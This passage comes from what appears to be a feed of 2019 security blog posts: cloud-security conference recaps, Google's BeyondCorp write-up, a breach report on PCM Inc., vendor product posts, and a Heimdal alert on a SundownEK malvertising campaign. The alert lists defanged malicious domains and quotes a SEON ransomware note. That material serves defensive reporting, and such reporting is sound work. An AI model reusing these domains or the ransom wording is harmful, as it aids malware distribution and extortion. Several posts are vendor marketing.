  • Use the Command Prompt (cmd) on a Windows machine, while the USB drive is plugged into your device. To access it, go to the Start menu, type in “Cmd”, press “enter”, and you’ll see the “cmd.exe” under a list of programs. Click on it and you will be directed to the Windows command line from where you can recover the virus-infected. The process may take a while, but it will clean up your computer.
  • Make sure you add multiple layers of security and consider using a proactive security solution to strengthen your protection.

Can you avoid malware infections?

Yes, you definitely can, if you’re paying close attention to these early malware infection signs and prevent them from happening.

Make sure your operating system, browsers, and plugins are always up to date because keeping your software patched can keep online criminals at bay.

Also, here’s a list of recommended articles to help you better survive a malware infection:

How to Easily Remove Malware from Your PC [Updated]

How to Protect Your PC with Multiple Layers of Security

32 Go-To Security Forums for Free Malware Removal Help

Make sure your network is safe and secure, and always think before you click on something. Also, remember to practice safe browsing and always access trusted online sources to easier prevent potential online threats.

Reminder: Knowledge and long-lasting education are our best weapons to fight against online threats, so it’s vital to learn and educate yourself and others to better understand how malware works on your system, and how you can mitigate its impact.

This article was originally published by Andra Zaharia in April 2016, updated by Ioana Rijnetu in December 2018, and edited by Bianca Soare in June 2019.

The post 13+ Warning Signs that Your Computer is Malware-Infected [Updated 2019] appeared first on Heimdal Security Blog.

Weekly Update 145

Weekly Update 145

Something totally new this week - Israel! I spent the week in Tel Aviv at Cyber Week, a massive infosec conference where I shared the keynote stage with an amazing array of speakers including many from three letter acronym departments and even PM Benjamin Netanyahu. It's funny how on the one hand an event like this can be so completely different to the very familiar NDC Oslo scene I was in just last week yet by the same token, I'm up there talking about all the same stuff and doing my usual thing.

This week, I'm talking about Israel, the Cyber Week event and how things are tracking with Project Svalbard (spoiler - bloody busy!) I also get a ticket from traffic cops for riding an electric scooter in a footpath so yeah, that's a new one for me...

Weekly Update 145
Weekly Update 145
Weekly Update 145

References

  1. I spent an afternoon in Jerusalem (link through to my Facebook pics, what an amazing place...)
  2. Plus, the better part of 4 days in Tel Aviv (posted more pics on the way to the airport at stupid o'clock this morning)
  3. TripAdvisor has been resetting a bunch of customers' passwords when found in a data breach (precisely what Scott and I were talking about last week in terms of many other companies proactively using breach data)
  4. strongDM is this week's blog sponsor (Use your SSO to grant or revoke access to any database, server, or k8s)

Senate Republicans Block Election Security Bill

A bill that would provide a billion dollars to states for election security was blocked by Senate Republicans.

The Election Security Act, proposed by presidential candidate Senator Amy Klobuchar (D-Minn.), would have required paper ballots for voting systems as well as for President Trump to provide a strategy for protecting institutions from foreign cyberattacks.

“There is a presidential election before us and if a few counties in one swing state or an entire state get hacked into there’s no backup paper ballots and we can’t figure out what happened, the entire election will be called into question,” said Klobuchar.

Senator James Lankford (R-Okla.), who has worked with Klobuchar on previous election security efforts, voted to stop the bill, arguing that federal funding couldn’t be effectively implemented in time for the 2020 elections. 

“No matter how much money we threw at the states right now, they could not make that so by the 2020 presidential election,” Lankford said. 

Calls for legislation to secure elections have been renewed in the wake of the redacted release of the Mueller report, which detailed Russian interference in 2016. While several bills have passed the House of Representatives, many have been blocked in the Republican-controlled Senate, particularly by Majority Leader Mitch McConnell. 

The post Senate Republicans Block Election Security Bill appeared first on Adam Levin.

AWS re:Inforce 2019 re:Cap

A wide angle shot of the conference registration desk for AWS re:Inforce with an endcap wall in a slight teal blue saying, "Welcome to AWS re:Inforce"

The inaugural AWS Cloud security conference—AWS re:Inforce—was held in Boston this week. Well over 8,000 attendees descended on the Boston Convention and Exhibition Center for two days jammed packed with security education and cloud content.

This was a very interesting conference because the dynamics of the attendees felt very different from typical AWS events. Usually at an AWS event, security teams are the odd people out. Making up a small portion of the attendees. At re:Inforce, the script flips and it seemed that the majority of attendees are in primarily security roles.

That’s great news for the show and for the community in general. Everyone in attendance and online was eager to learn about AWS Security Services, offers from AWS APN Partners, and what works—and what doesn’t—when it comes to securing cloud deployments.

https://www.youtube.com/watch?v=FKphJNfpWk8

Announcements

As with any AWS event, there were a number of announcements that covered new features and functionality. We didn’t get any new services but the size of these features makes up for that. Here’s my quick take on each of the major announcements and how it might be useful for you.

AWS Security Hub Goes GA

AWS Security Hub was first announced as a preview at AWS re:Invent 2018. This tool helps consolidate security information into one place. Data from various AWS Security Services (like Amazon GuardDuty, Amazon Macie, and Amazon Inspector) and from various AWS APN Partners feeds into Security Hub in order to highlight compliance issue and various security findings.

That term is key. A finding isn’t a log entry or an event or even an incident (as defined in infosec). A finding is generated by one of the security tools and is likely to start a security or compliance incident.

The goal of Security Hub is to make security data more visibility and actionable. It is not a replacement for a SIEM or a team of analysts. It is a fantastic tool to help highlight security issues with other teams.

Read more from Brandon West over on the AWS Blog.

AWS Control Tower Comes Out Of Preview

This service helps you to create strong, well-architected baselines for new AWS accounts within your organization. Control tower works with landing zones a concept first brought to the forefront at AWS re:Invent 2018.

Multi-account strategies are common within larger organizations and there are a number of security benefits to the approach if is well managed. The challenge is standardizing settings, configuration, and policy across accounts.

This is where AWS Control Tower comes into the picture. Working with AWS Organizations, AWS IAM, AWS Config, AWS CloudTrail, and AWS Service Catalog, you can configure what every new account within your organization should look it. This helps ensure that all of your teams are setup for success.

Read more from Jeff Barr.

VPC Traffic Mirroring

Up until now, you’ve only been able to glimpse at what’s going on with the network traffic in your VPC using AWS native features. The VPC Flow Log functionality provides the basics of source, destination, and size of traffic but actual packet analysis requires a better source of flow data.

VPC mirroring does exactly as promised, leveraging the AWS network layer to mirroring specific targets, sessions, or filters in order to analyze that traffic in another tool.

This can be helpful in network forensic analysis, troubleshooting, or operational analysis.

Jeff Barr has a walk through of the feature on the AWS Blog.

AWS Incident Response Whitepaper

Though published a few weeks before the event, AWS is highlighting the new AWS Security Incident Response Whitepaper. This paper helps security teams understand how traditional incident response maps to the AWS Cloud.

It’s a well-written, practical paper that can help teams understand how a process they are familiar with, changes in a new environment like the AWS Cloud.

Get an overview from Joshua Du Lac over on the AWS Security Blog.

AWS Marketplace Procurement System Integration

During the AWS re:Inforce keynote, Stephen Schmidt announced a new AWS Marketplace integration for existing procurement systems. On first blush, this seems like an odd feature to call out at a security conference.

But security is always a critical question in any enterprise sales engagement and procurement headaches abound. The AWS Marketplace can address some of those headaches.

This new integration (initially with Coupa and others via cXML) will make it easier for some enterprises to test and acquire new technologies, reducing the barrier to acquire new security tools.

Read more in the AWS Marketplace documentation.

What’s Next

At the end of the keynote, Stephen Schmidt announced that AWS re:Inforce will be held again next year, this time in Houston. That’s fantastic news as shows that AWS acknowledges that security is a critical pillar of well-built cloud deployments and that the community is strong enough to support events of this size dedicated to the topic.

The breakouts sessions from the show were recorded and are being posted to the AWS YouTube channel, the day 1 keynote by AWS CISO Stephen Schmidt has already been posted so you can start catching up now.

I did a take over on the Trend Micro LinkedIn page and went live twice during the show. Check that out for a bit of an insiders view and—as always—ping me on Twitter, where I’m @marknca to talk more about this and cloud security in general.

The post AWS re:Inforce 2019 re:Cap appeared first on .

Webroot DNS Protection: Now Leveraging the Google Cloud Platform

Reading Time: ~ 2 min.

We are  excited to announce Webroot® DNS Protection now runs on Google Cloud Platform (GCP). Leveraging GCP in this way will provide Webroot customers with security, performance, and reliability. 

Security

Preventing denial of service (DoS) attacks is a core benefit of Webroot DNS Protection. Now, the solution benefits from Google Cloud load balancers with built-in DoS protection and mitigation, enabling the prevention of attack traffic before it ever hits the agent core. 

“The big thing about Google Cloud is that it dynamically manages denial of service (DoS) attacks,” said Webroot Sales Engineer Jonathan Barnett. “That happens automatically, and we know Google has that figured out.”

Click here to learn why businesses need DNS protection.

Performance

With this release, Webroot DNS Protection now runs on the Google Cloud’s high-redundancy, low-latency networks in 16 regions worldwide. That means there’s no need for a Webroot customer in Australia to have a DNS request resolved in Los Angeles, when more convenient infrastructure exists close by.  

“Google Cloud provides the ability to scale by adding new regions or new servers whenever necessary as load or need determines, nationally or internationally,” said Barnett. “This allows us to provide geolocation-appropriate answers for our customers, maximizing performance.”

Reliability

Because of GCP’s global infrastructure footprint, Webroot can quickly and easily provision more of Google’s servers in any region to ensure latency times remain low. 

And because those regional deployments can be programmed to auto-scale with spikes in traffic, even drastically increasing loads won’t increase wait times for requests.

According to Barnett, “Even if Webroot were to take on a large number of customers in a short time period, say with the closing of a deal to offer DNS solutions to an enterprise-level client with a number of subsidiaries, our environments would automatically scale with the additional load.”

One more note on the release 

Another key feature of the April DNS agent update regards switching communications from port 53, which is typically associated with DNS requests, to port 443, which is more commonly associated with SSL certificates.

The reason for this change is that, given port 443’s relevance to routine requests like banking sites and those accepting payment information, it is rarely constrained, modified, or controlled. This will reduce the need to configure firewalls or make other admin adjustments in order for Webroot DNS Protection to function as intended. 

It’s good to be in good company

With Webroot DNS Protection now leveraging the GCP will power your network-level protection. Fewer outages, latency, and bottlenecks. Ready to experience Webroot DNS Protection for yourself? Try it free for 30-days here. 

The post Webroot DNS Protection: Now Leveraging the Google Cloud Platform appeared first on Webroot Blog.

Breach at Cloud Solution Provider PCM Inc.

A digital intrusion at PCM Inc., a major U.S.-based cloud solution provider, allowed hackers to access email and file sharing systems for some of the company’s clients, KrebsOnSecurity has learned.

El Segundo, Calif. based PCM [NASDAQ:PCMI] is a provider of technology products, services and solutions to businesses as well as state and federal governments. PCM has nearly 4,000 employees, more than 2,000 customers, and generated approximately $2.2 billion in revenue in 2018.

Sources say PCM discovered the intrusion in mid-May 2019. Those sources say the attackers stole administrative credentials that PCM uses to manage client accounts within Office 365, a cloud-based file and email sharing service run by Microsoft Corp.

One security expert at a PCM customer who was recently notified about the incident said the intruders appeared primarily interested in stealing information that could be used to conduct gift card fraud at various retailers and financial institutions.

In that respect, the motivations of the attackers seem similar to the goals of intruders who breached Indian IT outsourcing giant Wipro Ltd. earlier this year. In April, KrebsOnSecurity broke the news that the Wipro intruders appeared to be after anything they could quickly turn into cash, and used their access to harvest gift card information from a number of the company’s customers.

It’s unclear whether PCM was a follow-on victim from the Wipro breach, or if it was attacked separately. As noted in that April story, PCM was one of the companies targeted by the same hacking group that compromised Wipro.

The intruders who hacked into Wipro set up a number of domains that appeared visually similar to that of Wipro customers, and many of those customers responded to the April Wipro breach story with additional information about those attacks.

PCM never did respond to requests for comment on that story. But in a statement shared with KrebsOnSecurity today, PCM said the company “recently experienced a cyber incident that impacted certain of its systems.”

“From its investigation, impact to its systems was limited and the matter has been remediated,” the statement reads. “The incident did not impact all of PCM customers; in fact, investigation has revealed minimal-to-no impact to PCM customers. To the extent any PCM customers were potentially impacted by the incident, those PCM customers have been made aware of the incident and PCM worked with them to address any concerns they had.”

On June 24, PCM announced it was in the process of being acquired by global IT provider Insight Enterprises [NASDAQ:NSIT]. Insight has not yet responded to requests for comment.

Earlier this week, cyber intelligence firm RiskIQ published a lengthy analysis of the hacking group that targeted Wipro, among many other companies. RiskIQ says this group has been active since at least 2016, and posits that the hackers may be targeting gift card providers because they provide access to liquid assets outside of the traditional western financial system.

The breach at PCM is just the latest example of how cybercriminals increasingly are targeting employees who work at cloud data providers and technology consultancies that manage vast IT resources for many clients. On Wednesday, Reuters published a lengthy story on “Cloud Hopper,” the nickname given to a network of Chinese cyber spies that hacked into eight of the world’s biggest IT suppliers between 2014 and 2017.

How Google adopted BeyondCorp


It's been almost five years since we released the first of multiple BeyondCorp papers, describing the motivation and design principles that eliminated network-based trust from our internal networks. With that anniversary looming and many organizations actively working to adopt models like BeyondCorp (which has also become known as Zero Trust in the industry), we thought it would be a good time to revisit topics we have previously explored in those papers, share the lessons that we have learned over the years, and describe where BeyondCorp is going as businesses move to the cloud.

This is the first post in a series that will focus on Google’s internal implementation of BeyondCorp, providing necessary context for how Google adopted BeyondCorp.

Why did we adopt BeyondCorp?

With a traditional enterprise perimeter security model, access to services and resources is provided by a device being connected to a privileged network. If an employee is in a corporate office, on the right network, services are directly accessible. If they're outside the office, at home or in a coffee shop, they frequently use a VPN to get access to services behind the enterprise firewall. This is the way most organizations protect themselves.

By 2011, it became clear to Google that this model was problematic, and we needed to rethink how enterprise services are accessed and protected for the following reasons:

Improving productivity
  • A growing number of employees were not in the office at all times. They were working from home, a coffee shop, a hotel or even on a bus or airplane. When they were outside the office, they needed to connect via a VPN, creating friction and extending the network perimeter.
  • The user experience of a VPN client may be acceptable, even if suboptimal, from a laptop. Use of VPN is less acceptable, from both employees and admins perspectives, when considering growing use of devices such as smartphones and tablets to perform work.
  • A number of users were contractors or other partners who only needed selective access to some of our internal resources, even though they were working in the office.
Keeping Google secure
  • The expanded use of public clouds and software-as-a-service (SaaS) apps meant that some of our corporate services were no longer deployed on-premises, further blurring the traditional perimeter and trust domain. This introduced new attack vectors that needed to be protected against.
  • There was ongoing concern about relying solely on perimeter defense, especially when the perimeter was growing consistently. With the proliferation of laptops and mobile devices, vulnerable and compromised devices were regularly brought within the perimeter.
  • Finally, if a vulnerability was observed or an attack did happen, we wanted the ability to respond as quickly and automatically as possible.

How did we do it?

In order to address these challenges, we implemented a new approach that we called BeyondCorp. Our mission was to have every Google employee work successfully from untrusted networks on a variety of devices without using a client-side VPN. BeyondCorp has three core principles:
  • Connecting from a particular network does not determine which service you can access.
  • Access to services is granted based on what the infrastructure knows about you and your device.
  • All access to services must be authenticated, authorized and encrypted for every request (not just the initial access).


High level architecture for BeyondCorp

BeyondCorp gave us the security that we were looking for along with the user experience that made our employees more productive inside and outside the office.

What lessons did we learn?

Given this was uncharted territory at the time, we had to learn quickly and adapt when we encountered surprises. Here are some key lessons we learned.

Obtain executive support early on and keep it

Moving to BeyondCorp is not a quick, painless exercise. It took us several years just to get most of the basics in place, and to this day we are still continuing to improve and refine our implementation. Before embarking on this journey to implement BeyondCorp, we got buy in from leadership very early in the project. With a mandate, you can ask for support from lots of different groups along the way.

We make a point to re-validate this buy-in on an ongoing basis, ensuring that the business still understands and values this important shift.

Recognize data quality challenges from the very beginning

Access decisions depend on the quality of your input data. More specifically, it depends on trust analysis, which requires a combination of employee and device data.

If this data is unreliable, the result will be incorrect access decisions, suboptimal user experiences and, in the worst case, an increase in system vulnerability, so the stakes are definitely high.
We put in a lot of work to make sure our data is clean and reliable before making any impactful changes, and we have both workflows and technical measures in place to ensure data quality remains high going forward.

Enable painless migration and usage

The migration should be a zero-touch or invisible experience for your employees, making it easy for them to continue working without interruptions or added steps. If you make it difficult for your employees to migrate or maintain productivity, they might feel frustrated by the process. Complex environments are difficult to fully migrate with initial solutions, so be prepared to review, grant and manage exceptions at least in the early stages. With this in mind, start small, migrate a small number of resources, apps, users and devices, and only increase coverage after confirming the solution is reliable.

Assign employee and helpdesk advocates

We also had employee and helpdesk advocates on the team who represented the user experience from those perspectives. This helped us architect our implementation in a way that avoided putting excess burden on employees or technical support staff.

Clear employee communications

Communicating clearly with employees so that they know what is happening is very important. We sent our employees, partners, and company leaders regular communications whenever we made important changes, ensuring motivations were well understood and there was a window for feedback and iteration prior to enforcement changes.

Run highly reliable systems

Since every request goes through the core BeyondCorp infrastructure, we needed a global, highly reliable and resilient set of services. If these services are degraded, employee productivity suffers.

We used Site Reliability Engineering (SRE) principles to run our BeyondCorp services.

Next time

In the next post in this series, we will go deeper into when you should trust a device, what data you should use to determine whether or not a device should be trusted, and what we have learned by going through that process.

In the meantime, if you want to learn more, you can check out the BeyondCorp research papers. In addition, getting started with BeyondCorp is now easier using zero trust solutions from Google Cloud (context-aware access) and other enterprise providers.

This post was updated on July 3 to include Justin McWilliams as an author.

Top 3 Challenges with Securing the Cloud

Cloud SecurityBy 2020,  it’s predicted that 83% of company workload will be stored in the cloud (Forbes).  This rise in usage and popularity comes at no surprise with how cost-effective and easy it is to manage systems in the cloud.

As more critical applications are migrating towards the cloud, data privacy and software security are becoming a greater concern.  With 60% of web applications compromised due to cloud-based email servers (Verizon 2019 DBIR), it’s time to take these concerns seriously.

The cloud has had its share of attacks over the years, from DDoS to data loss attacks and even data breaches.  Whether malicious tampering or accidental deleting, these attacks can lead to a loss of sensitive data and often a loss of revenue.

How exactly do we secure data and prevent against these attacks in the cloud?

The one way to truly secure your data in the cloud is through continual monitoring of your cloud systems. However, this is a challenging process for several reasons:

1.    Lack of Visibility

Cloud technology solutions often make the job of security providers more difficult because they don’t provide a single-pane-of-glass to view all endpoints and data. For this reason, you need a vast number of tools to monitor your cloud systems. For example, most cloud solutions send email notifications that provide some visibility into your environment.  However, these notifications don’t always provide enough insight into what exactly happened. You may receive an email alert about a suspicious login, but many of these alerts don’t give information about where the login attempt happened and what user was affected.

These vague alerts mean you have to investigate further; however, many of these cloud systems don’t have very useful investigative tools. If you want to find out more about the alert, you may be able to view the reports and read the logs associated with the activity, but that requires practice in knowing what to look for and how to interpret the information. This leads to another challenge in cloud security: lack of expertise.

2.    Lack of Expertise

It takes practice to be able to look at security logs and interpret what the activity means. Different cloud providers may produce different types of logs and it can be difficult to translate the many varying log types.

If you want to secure your cloud environment properly, you will need a team dedicated to configuring, monitoring and managing these tools. Through 2022, it’s predicted that 95% of cloud security failures will result from customer error (Gartner).  This reinforces the need to configure your cloud environment properly. Interpreting logs and configuring cloud systems requires skills that are developed overtime.  Many security professionals lack this particular expertise or the time required to properly develop these skills.

Those that do possess these skills and knowledge are in high demand, and there simply aren’t enough people to fill these positions.

3.    Lack of Resources

Implementing all the right tools and staffing appropriately to monitor these tools around-the-clock is not an inexpensive endeavor.  Luckily, there are services you can leverage to augment your staff and monitor your environment, such as a managed security services provider (MSSP).

MSSPs have the tools and resources to pull information from all of your different cloud systems and monitor them in one place.  With a full staff of experts on-hand at all hours, an MSSP is fully prepared to monitor and respond to incidents. They can help provide the expertise and visibility into your cloud environment required to properly secure your cloud systems.

The post Top 3 Challenges with Securing the Cloud appeared first on GRA Quantum.

Get Ready for Hot Dogs & Hacking!

We love feedback! Luckily, the security community errs on the side of collaboration, resulting in constructive, helpful feedback whenever it is requested - and often even when it’s not. From a company perspective this is great since we know exactly what our customers are thinking at most times. From a Cyber Range product perspective it's OUTSTANDING - the ideas for updates, new challenges, areas to explore and events to host has left us with a backlog full of gems to choose from at any time. In other words, our product team is living in a dream world full of great ideas!

Live from AWS re:Inforce: Learnings from Security Enablement for DevOps at AT&T

Veracode AWS reInforce Building an AppSec Program

This week, AWS ran its inaugural security conference AWS re:Inforce in Boston. There were several interesting talks at the conference, and I found John Maski’s presentation, “Integrating AppSec in your DevSecOps on AWS,” contained great practical advice. Maski worked for AT&T for 32 years, with his most current role being Director, Production Resiliency & DevSecOps Enablement. He recently joined Veracode to advise customers on how to best integrate Veracode into their security pipeline, and we’re lucky to have him on the team.

Support from Executive Leadership is Crucial

Starting out, and as expected for any large organization, Maski found a huge variety of skill levels and a lot of variation in how people ran their development pipelines outside of the central DevOps initiative.  Software development was optimized for speed – aka “quantity” – and security was an afterthought. 

On the upside, Maski saw pockets of advanced knowledge and CI/CD implementations. A significant CI/CD platform was already in the works. Most importantly, there was a huge appetite among executives for making quick and extensive progress.

“In an organization the size of AT&T, you can’t make meaningful progress without the support of executive leadership,” Maski said. “It is absolutely critical to drive the necessary cultural changes.”

With this backing, he set out to connect with partner organizations, working collectively towards the seemingly impossible goal to secure AT&T’s entire application landscape. Spoiler alert: When Maski recently left AT&T, they were very close to completing this goal.

Integrating Security into the CI/CD Pipeline

If you are coming from the security side of the house and are in charge of application security, it really pays off to truly understand your organization’s development tools and how pipelines are set up. Not only will you be able to speak your engineering team’s language, you will be better suited to advise them on how to integrate security testing solutions.

Most of application security can and should be automated, with the exception of what’s at the very beginning and the very end of the process. Threat modeling is still a manual process that relies on human understanding of the architecture, even if there are tools that help visualize and document this process. Likewise, penetration testing is a final litmus test at the end of the development process that should be carried out on any critical application before it is deployed into production.

In the middle are various automated testing solutions that should be run automatically to regularly provide feedback on security defects. Static analysis tests the application code for a broad range of security flaws, and it can be fully automated into both the IDE and the CI process. In the IDE, it provides early security guidance and education to software engineers while they are coding by highlighting potential vulnerabilities and suggesting best practices. Veracode has found that integrating SAST in this early stage in the process has helped organizations to reduce newly introduced flaws by 60 percent.

However, guidance at this stage is not mandatory and is mostly suitable to removing flaws in newly written code. To ensure a more structured feedback and compliance process, static analysis should be integrated into the SDLC. Typically, development teams would scan as part of their CI process, either on a code commit or a pull request, and get security defects flagged through the ticketing system. They will do this scan in a “sandbox,” so that results do not get escalated to the security team. Finally, for high security applications, we recommend doing a scan on the full scope of the application before each deployment to ensure that no security defects escape to production.

Software composition analysis looks at known vulnerabilities in open source libraries that are being used in the code. If you find such a vulnerability, the fix is usually upgrading to a different library version rather than fixing the open source code yourself. SCA often integrates with the SDLC in the same places as static analysis.

Dynamic analysis is a third way of looking for vulnerabilities in software and is typically applied to web applications. Unlike static analysis, which looks at the application code, dynamic analysis interacts with the application via an instrumented browser that crawls and audits the application. While findings with other testing solutions overlap, there are several security issues that only dynamic analysis can detect, including server configuration errors. Dynamic analysis is typically run in the QA stage against a staging server and against the production server.

Five Tips for Getting Traction with Your DevSecOps Initiative

With many lessons learned having during his DevSecOps initiative at AT&T, Maski shared his five recommendations to get traction with your own program:

  1. Partner with stakeholders: Identify, collaborate, and align with your partners, especially in software development. You have to understand their world and respect their point of view for your program to be successful.
  2. Pick the right metrics: Know your metrics before you jumpstart the program. Talk upfront with your sponsors and partners on what success means to them and agree on metrics.
  3. Don’t boil the ocean: Go “Agile.” Pick pilot applications to secure, so that you can learn from the process and expand to the next group of applications. Keep note of what you learn along the way to improve the program over time.
  4. Run an internal campaign: Communicate effectively to raise awareness about the importance of AppSec to the business. Tie AppSec to the mission of the company. Use your communication to educate DevOps team members about AppSec to help strengthen their expertise.
  5. Demonstrate progress: To ensure continued executive support for your program, regularly report your program’s progress through the metrics you picked. Tailor your progress reports to the audience; for example, your senior leadership will want to see different metrics than your engineering partners.

Key Learnings from AT&T’s DevSecOps Program

Maski left the audience with three key learnings from running his program:

  • Strong Executive Leadership is key to driving the necessary cultural changes – and to secure the required budget.
  • If getting your program started quickly is a requirement, use services built on a robust platform. That way you can focus on onboarding applications rather than building and maintaining scanning infrastructure.
  • Build a strong team and have a flexible plan. Map out and communicate your plan with confidence. That doesn’t mean that your plan has to be perfect – learn and adjust as you go along. Set bold goals to drive progress.

Veracode was and is a cornerstone of AT&T’s AppSec strategy. If you’d like to learn how to build an AppSec program in your organization, download The Ultimate Guide to Getting Started With Application Security.

Key benefits of Seqrite Secure Web Gateway

Estimated reading time: 2 minutes

Enterprises are recently waking up to the usefulness of having layered protection for their networks. This involves investing in various layers of protection such as anti-virus, anti-malware, anti-spyware and a firewall. However, firewalls while providing protection can often fall short when compared to the sheer pace with which cyber criminals adapt and create new threats. This is where secure web gateways can help boost cybersecurity – by acting as a gateway between the Internet and the network, secure web gateways can prevent unsecured traffic from entering an organization’s internal network and prevent employees from accessing or being infected by malicious traffic.

Seqrite’s Secure Web Gateway (SWG) solution provides advanced traffic, providing an intuitive solution that filters unwanted software/malware from user-initiated Web/Internet traffic and enforces corporate and regulatory policy compliance. SWG offers policy-controlled solutions transforming the web from a risky to a secure environment tailored exactly to the organization’s needs.

The benefits of SWG

SWG defends users from Internet-borne threats such as unwanted software/malware. It helps enterprises enforce corporate and regulatory policy compliance. It is integrated with Quick Heal’s renowned scan engine and URL categorization service, backed by a cloud-based, dynamic real-time categorization offering emerging protection against web threats. Architected on the powerful machine learning engine, the URL filtering feature offers best-in-class identification and prevention of known & unknown threats with high accuracy. Seqrite’s unparalleled expertise in cyber threat intelligence is trusted by millions of users and equips Seqrite SWG to offer the most comprehensive protection.

A few key benefits of Seqrite Secure Web Gateway are:

Security – SWG integrates some of Seqrite’s industry-leading cybersecurity solutions into one comprehensive platform. With advanced URL filtering, anti-virus, anti-phishing measures, anti-malware measures, SWG offers unparalleled protection to enterprises.

Performance – Enterprises often consider the kind of performance impact a cybersecurity solution will have. Powerful solutions may have an impact of performance but SWG offers a convenient solution – the highest protection with a minimal performance impact.

Usability – SWG is designed to be simple and easy-to-use so that security administrators spend less time on setting it up and more time on keeping their enterprises safe. Pre-defined templates are offered for setting up various corporate policies with also the flexibility offered to customize policies, ensuring enterprises can adapt it for their own specific needs.

Scalability – This is a solution which can be used without any regard to size of an enterprise. The biggest and the smallest of organizations can safely go for SWG considering that multiple instances of Seqrite SWG can co-exist on the same server without any necessary inter-dependence, thus making it highly scalable.

Thanks to product highlights like User/Application/Content-based granular policies, SSL inspection, URL filtering, high speed in-memory virus detection, application control, Data Loss Prevention (DLP) and easy integration with Microsoft AD/Open LDAP, Seqrite Secure Web Gateway (SWG) offer the kind of advanced protection that today’s enterprises can be confident about using to secure their enterprise and achieve their cybersecurity goals.

The post Key benefits of Seqrite Secure Web Gateway appeared first on Seqrite Blog.

Security Alert: Malvertising campaign using SundownEK drops SEON ransomware

The advertising systems of several popular websites have been compromised by an injection of a malicious script that redirects random visitors to a SundownEK gateway.

Then, non-updated systems are prone to ransomware infections.

The respective injection redirects the traffic via the following chain (sanitized by CSIS):

fastimage[.]site

–> adsfast[.]site

–> accomplishedsettings.cdn-cloud[.]club

The latter acts as SundownEK payload delivery and it is by no means the only subdomain that uses this FQDN for this kind of activity (sanitized by CSIS):

papersnow.cdn-cloud[.]club

woodfigure.cdn-cloud[.]club

alldistrict.cdn-cloud[.]club

bottomboard.cdn-cloud[.]club

examplewhat.cdn-cloud[.]club

lacksolvent.cdn-cloud[.]club

longregions.cdn-cloud[.]club

openlyklerk.cdn-cloud[.]club

securedcity.cdn-cloud[.]club

entirecables.cdn-cloud[.]club

nothingteach.cdn-cloud[.]club

reliesbitter.cdn-cloud[.]club

visionetmail.cdn-cloud[.]club

madridbelgium.cdn-cloud[.]club

usaconceptual.cdn-cloud[.]club

awaitingborrow.cdn-cloud[.]club

bankruptcywood.cdn-cloud[.]club

craiginsurance.cdn-cloud[.]club

encountercarry.cdn-cloud[.]club

intervalscobol.cdn-cloud[.]club

quantumsession.cdn-cloud[.]club

southeastmerit.cdn-cloud[.]club

testifiedearly.cdn-cloud[.]club

beamwordperfect.cdn-cloud[.]club

clonesdiagnosis.cdn-cloud[.]club

does-no-exist33.cdn-cloud[.]club

numberprolonged.cdn-cloud[.]club

pickingteentage.cdn-cloud[.]club

rejectedpumping.cdn-cloud[.]club

biddersoperation.cdn-cloud[.]club

corruptionspirit.cdn-cloud[.]club

criminalappealed.cdn-cloud[.]club

indexestargeting.cdn-cloud[.]club

maastrichtluxury.cdn-cloud[.]club

commissionmethane.cdn-cloud[.]club

officiallyjustice.cdn-cloud[.]club

reactiongeneration.cdn-cloud[.]club

regulatorsdefinite.cdn-cloud[.]club

descriptionsfashion.cdn-cloud[.]club

investigatorsimpose.cdn-cloud[.]club

participatetransmit.cdn-cloud[.]club

accomplishedsettings.cdn-cloud[.]club

organizingconsiderable.cdn-cloud[.]club

The domain (sanitized by CSIS) mtproto[.]world could be activated in case the domain previously mentioned is disabled.

SundownEK will try to exploit vulnerabilities in Adobe Flash Player and Internet Explorer.

If the machine has not been properly updated, a binary payload will be delivered. This will run a ransomware of the SEON class, namely version 0.2 of this malicious ransomware.

Not only that, but a slightly modified version of data stealer Pony will also be dropped.

This SEON variant adds the file extension .FIXT to all data files, both locally and on all available network drives.

Criminals request that the victims contact them via several email addresses listed in the SEON ransomware message.

All folders that have had data encrypted by SEON ransomware contain a text file with the following note:

SEON RANSOMWARE ver 0.2

    all your files has been encrypted

    there is only way to get your files back: contact with us, get decryptor software and pay

    We accept Bitcoin and other cryptocurrencies

    You can decrypt 1 file for free

    Our contact emails:

    [removed by CSIS]-

Heimdal blocks the related domains, so all Thor Home and Thor Enterprise users are safe.

The security guide you need to follow so you don’t risk losing your data

There is no guarantee that a key for the SEON Ransomware will be provided by this group in exchange for money.

And even if the malicious group actually provided a key that decrypts your files, you should not be paying them. By offering them money, you are encouraging this type of criminal online behavior.

As per our knowledge, currently, there is no free decryption tool available for SEON.

So, here are the steps you need to follow to stay protected against the SEON ransomware (and other ransomware strains in general):

#1. Make sure you always apply updates to your system, software, and apps.

In this specific case, check if you are running the latest version of Adobe Flash Player and IE. Or use a solution that closes security holes in your software through automatic patching, like Thor Free.

#2. Always back up your files.

If you have a copy of your files stored somewhere, either on an external hard drive or in the Cloud, the ransomware attack wouldn’t mean that much to you. Well, of course, you would have to start out with a fresh PC installation, but at least you still have access to your backed-up important documents.

This guide will show you how to back up your files.

#3. Have a good security solution running on your PC.

Use a proactive, anti-malware solution that detects threats before they happen. Malware is specially developed to bypass your traditional antivirus, but if you add additional security layers, you can rest assured you are safe.

For example, Thor Foresight Home always protects you against ransomware attacks, because it filters your Internet traffic and blocks ransomware distribution sources. Also, it automatically updates your apps, so you don’t have to worry about it. And it works great alongside any other antivirus software.

The easy way to protect yourself against malware
Here's 1 month of Thor Foresight Home, on the house!
Use it to: Block malicious websites and servers from infecting your PC Auto-update your software and close security gaps Keep your financial and other confidential details safe

EASY AND RELIABLE. WORKS WITH ANY ANTIVIRUS.

Try Thor Foresight

#4. DO NOT pay the ransom.

I’ve said this before and I’ll say it again: whatever you do, just don’t pay the ransom!

*This article features cyber intelligence provided by CSIS Security Group researchers. 

 

The post Security Alert: Malvertising campaign using SundownEK drops SEON ransomware appeared first on Heimdal Security Blog.

Smashing Security #134: Sextortion, silicone face masks, and a DDoS doofus

Scammers steal millions by impersonating a French politician, we offer fashion tips for DDoS attackers, and hear how a small town fought a sextortionist preying on young women.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Jessica Barker.

Klaytn Will Onboard Cloudbric Following Mainnet Launch

cloudbric klaytn blockchain mainnet launchThe internet giant KakaoTalk has just launched its blockchain platform on June 27, 2019. The mainnet launch was orchestrated by KakaoTalk’s blockchain arm, Ground X. 

This marks a big occasion for both Klaytn and Cloudbric, who is a technology ISP (Initial Service Partner).  

Klaytn has emphasized the importance of ISPs who provide substantial and tangible service use-cases for the blockchain ecosystem. Because the main focus of the company is on the Dapps (decentralized apps) that run on the blockchain, Cloudbric will launch a crypto security app for within Q3.

